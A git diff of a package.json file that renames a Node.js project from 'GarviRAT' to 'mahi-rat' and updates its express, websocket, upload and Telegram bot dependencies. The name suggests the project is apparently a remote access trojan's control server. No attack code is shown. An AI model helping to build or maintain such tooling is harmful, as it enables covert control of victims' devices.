--- a/package.json
+++ b/package.json
@@ -1,24 +1,22 @@
 {
-  "name": "GarviRAT",
+  "name": "mahi-rat",
   "version": "1.0.0",
-  "description": "its a Free Version",
+  "description": "",
   "main": "server.js",
-  "engines": {
-    "node": "16.13.2"
-  },
   "scripts": {
-    "start": "node server.js"
+    "test": "echo \"Error: no test specified\" && exit 1"
   },
-  "keywords": ["Testing"],
-  "author": "@A1BUG",
+  "keywords": [],
+  "author": "",
   "license": "ISC",
   "dependencies": {
-    "body-parser": "^1.19.1",
-    "express": "latest",
-    "multer": "^1.4.4",
-    "node-telegram-bot-api": "latest",
-    "uuid": "^8.3.2",
-    "ws": "latest",
-    "axios": "^0.26.1"
+    "@types/node": "^18.0.6",
+    "axios": "^1.7.1",
+    "body-parser": "^1.20.2",
+    "express": "^4.19.2",
+    "multer": "^1.4.5-lts.1",
+    "node-telegram-bot-api": "^0.66.0",
+    "uuid": "^9.0.1",
+    "ws": "^8.17.0"
   }
 }
